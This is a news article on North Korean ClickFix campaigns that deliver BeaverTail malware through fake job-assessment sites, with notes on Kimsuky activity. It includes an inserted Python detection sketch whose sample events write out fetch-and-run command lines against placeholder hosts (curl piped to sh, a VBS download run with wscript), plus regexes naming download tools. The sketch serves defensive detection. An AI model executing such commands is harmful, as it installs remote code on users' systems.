North Korean Hackers Shift Tactics to Target Cryptocurrency and Retail Sectors with ClickFix Malware Lures

News Desk
Last updated: September 22, 2025 2:37 am
Published: September 22, 2025

Threat actors linked to the Democratic People’s Republic of Korea (DPRK) are increasingly employing ClickFix-style lures to distribute malware, notably BeaverTail and InvisibleFerret. Recent intelligence from GitLab highlights a shift in targeting strategies, focusing on marketing and trading roles within cryptocurrency and retail sectors, rather than traditional software development positions.

BeaverTail and InvisibleFerret were first documented by Palo Alto Networks in late 2023 as part of a broader campaign known as Contagious Interview, which has been active since December 2022. The campaign aims to deliver malware to software developers under the guise of job assessments. Assessed to be a subset of the Lazarus group, these threat actors have used various methods for propagation, including fraudulent npm packages and fake Windows videoconferencing tools.

In a noteworthy development, the latest wave of attacks—identified in May 2025—stands out for its delivery mechanism and target audience. The attackers employed ClickFix tactics to distribute BeaverTail, utilizing a fake hiring platform built using Vercel that advertised various Web3 positions alongside opportunities in cryptocurrency trading. Uniquely, this campaign appears to have shifted focus to marketing applicants, diverging from the typical emphasis on developers and cryptocurrency professionals.

Victims navigating to the malicious site find their public IP addresses logged and are prompted to record a video assessment. A fabricated technical issue concerning microphone functionality leads them to execute specific commands tailored to their operating systems, ultimately facilitating the download of a leaner BeaverTail version via shell or Visual Basic scripts. This variant exhibits a streamlined information-stealing routine and only targets eight browser extensions, a significant reduction from previous variants that targeted 22 extensions.
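The pasted-command step described above leaves a recognisable trace in process-creation telemetry. The following detection sketch is an added example, not code from GitLab's report or from this article; the event schema (`id`, `parent`, `image`, `cmdline`), the heuristics, and the `example.invalid` hosts are assumptions, and the sample events are constructed.

```python
import re

# Assumed heuristics, not indicators from the reporting: a pasted "fix" shows up as
# an interactively started shell whose one command line both fetches remote content
# and hands a shell or Visual Basic script to an interpreter.
FETCH = re.compile(r"\b(curl|wget|invoke-webrequest|iwr|certutil|bitsadmin)\b", re.I)
RUN_SCRIPT = re.compile(
    r"(\|\s*(ba|z)?sh\b|\b(wscript|cscript)\b|\.vbs\b|\b(ba|z)?sh\s+\S+\.sh\b)", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "bash", "zsh", "sh"}
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "terminal"}

def reasons_for(event):
    """Return the list of heuristics one process-creation event matches."""
    reasons = []
    if (event["image"].lower() in SHELLS
            and event["parent"].lower() in INTERACTIVE_PARENTS):
        reasons.append("shell started from the desktop or a terminal")
    if FETCH.search(event["cmdline"]):
        reasons.append("fetches remote content")
    if RUN_SCRIPT.search(event["cmdline"]):
        reasons.append("runs a shell or VBS script")
    return reasons

def flag_clickfix(events):
    """IDs of events that match all three heuristics; any one alone is routine."""
    return [e["id"] for e in events if len(reasons_for(e)) == 3]

# Constructed sample events (hypothetical schema: id, parent, image, cmdline).
SAMPLE_EVENTS = [
    {"id": "win-paste", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": r'cmd /c curl -s -o "%TEMP%\fix.vbs" https://hiring.example.invalid/fix'
                r' && wscript "%TEMP%\fix.vbs"'},
    {"id": "mac-paste", "parent": "Terminal", "image": "zsh",
     "cmdline": "curl -s https://hiring.example.invalid/mic-fix.sh | sh"},
    {"id": "dev-download", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "curl -O https://releases.example.invalid/tool.tar.gz"},
    {"id": "ci-build", "parent": "code.exe", "image": "powershell.exe",
     "cmdline": "powershell -File build.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["id"], reasons_for(ev))
    print("flagged:", flag_clickfix(SAMPLE_EVENTS))
```

Requiring all three signals keeps routine downloads, such as the constructed `dev-download` event, out of the alert queue.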

Additionally, the Windows version of BeaverTail utilizes a password-protected archive for loading Python dependencies related to InvisibleFerret. This tactic, while not novel within the broader cyber threat landscape, marks a first for BeaverTail, indicating that these threat actors are refining their operational strategies. Despite this evolution, preliminary assessments suggest that the scope of the campaign may have been limited, signaling more of a test phase than a large-scale deployment.

In a larger context, recent collaborative research from SentinelOne, SentinelLabs, and Validin revealed that at least 230 individuals were targeted in cryptocurrency-related job interviews between January and March 2025. This effort included impersonating reputable firms like Archblock, Robinhood, and eToro, using ClickFix strategies to spread malicious Node.js applications that masquerade as critical updates.

The operational tactics of the DPRK-linked threat actors reveal an ongoing adaptation to maintain effectiveness despite challenges. They monitor for potential detection of their activities and acquire new infrastructure as needed, preferring rapid provisioning to sustain operations over overhauling existing frameworks.

Amidst these developments, a notable ascendance of the Kimsuky hacking group has also been observed. Recently, they were implicated in two separate campaigns that exploited GitHub repositories for malware distribution and executed spear-phishing efforts utilizing deepfake technology. Their activities demonstrate a significant shift toward deploying malicious payloads using trusted infrastructures and advanced methods, including the generation of counterfeit military ID cards aimed at South Korean defense personnel.

These incidents illustrate not only the persistent threat posed by North Korean hackers but also their evolving strategies, which now encompass both espionage and financially motivated activities. The integration of new technologies, such as deepfake creation and refined delivery systems, suggests a sophisticated operational posture that capitalizes on emerging vulnerabilities in both human and technical layers of security.
